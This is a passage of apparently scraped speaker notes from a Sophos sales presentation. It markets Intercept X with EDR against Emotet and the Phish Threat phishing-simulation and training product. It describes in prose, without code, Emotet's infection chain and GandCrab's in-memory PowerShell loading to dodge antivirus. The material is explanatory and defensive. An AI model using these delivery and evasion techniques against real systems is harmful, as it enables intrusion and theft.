infect other organizations Let’s have a look in more detail….
  7. Let’s start by looking at how Intercept X Advanced with EDR helps stop Emotet from infecting your customers’ endpoints.
  8. Let’s look at how Emotet works in a bit more detail with the help of this threat chain. This is a real case, from Sophos support, and we’re using the EDR capabilities in Intercept X to see what’s happened here. We did have to disable some protections to see the full threat chain as usually this would have been stopped much sooner It starts with the user receiving a malicious email. The user then clicks on a malicious attachment And then the user enables malicious macros in the document. The macro uses CMD to execute obfuscated code CMD then launches a second copy of CMD That second copy launches Microsoft PowerShell PowerShell connects on an IP address and downloads a file called 431.exe PowerShell executes 431.exe Intercept X detects PowerShell connecting to a suspicious IP address and downloading an exe with unknown reputation, and blocks this behaviour, and identifies the root cause - Outlook
  9. Intercept X is packed with multiple layers of advanced technologies that provide sophisticated protection against Emotet. Thinking back to the threat chain we saw earlier Emotet: Started with a spam email with a link to a Word document including macros Word macro starts a PowerShell script, which connects to an IP address, and then downloads an .exe It then spreads across the network, taking advantage of exploits like Eternal Blue, and SMB shares, and escalating privileges It also communicates with the Command and Control servers to receive instructions and send back data And then it carries out it’s payload, which may be delivering a banking Trojan, stealing data, installing ransomware … Intercept X technologies protect at every part of that attack chain. You need these multiple layers of protection to secure against such a fast-moving, sophisticated threat as Emotet. One area to particularly call out is the deep learning capabilities. The powerful AI technology in Intercept X enables it to predict threats that have never been seen before, which is essential for polymorphic malware like Emotet. We don’t know what Emotet will look like next week, next month, but the predictive technologies can block threats that have never been seen before. It’s you’re best possible future-proofing.
  10. The function scheduled to run in 1 million seconds’ time contains a full, base64 encoded copy of the GandCrab malware, which is loaded directly into memory by PowerShell. This technique is an attempt to dodge antivirus software by using a legitimate executable, PowerShell, and avoiding filesystem writes.
  11. For over 30 years Sophos has been delivering innovative, simple, and highly-effective cybersecurity solutions to IT professionals and the channel that serves them. And we understand that securing organisations today has a lot to do with educating employees around the cyber security threats they face Where as in the past attackers would target systems, applications, networks. Today they target often the weakest link in the organisations – Employees – with social engineering and deception
  12. Combine email security with simulated phishing attacks that allow you to test user awareness by emulating the tactics used by real phishing attackers, and couple that with training to educate end users so they know how to spot and stop the real thing. And perhaps most importantly measure progress and improvement to demonstrate ROI to the rest of the business. Phish Threat from Sophos does all three. With over 140 customizable attack templates fed by latest threat intelligence Over 30 interactive training courses covering a range security and compliance topics And comprehensive reporting. Allowing you to measure performance by campaign, individual user, and at an organizational level to measure susceptibility to attack.
  13. A range of customizable campaigns that mirror the tactics used in real phishing attacks. Phishing link campaign – where we are trying to lure a user to click a phishing link Credential harvesting – this time where we are sending users to a fake credential harvesting website to enter username and password details (don’t worry, we don’t store any data) Attachment campaigns – where we lure a use to open an attachment that could in the real word contain a malware downloader for instance And lastly a Training-only campaign – no simulated attack this time. You create your own branded email and attach training Each campaign style is fully customizable – from attack email, to training landing pages and training reminder emails. All templates and training is available in a choice of nine languages: English French German Italian Spanish Portguese Korean Traditional Chinese Japanese
  14. And combine that with how quickly users are reporting simulated phishing emails – allowing us to monitor behavior changing from knowing to doing – a really important distinction when combatting real cyber threats.   And I’ll add this is one of a number of reports and dashboards providing insight in organizational, campaign and individual behavior.
  15. Well with the Outlook add-in for Phish Threat for enhanced reporting we can do just that. Allowing users to report malicious emails direct from the inbox and passing that data feed to Sophos Email, Endpoint and web security products through SophosLabs.   And also surface that data in Sophos Central.